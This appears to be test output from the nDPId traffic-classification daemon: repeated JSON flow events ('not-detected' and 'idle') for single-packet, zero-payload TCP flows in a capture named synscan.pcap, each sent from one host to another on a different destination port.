-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 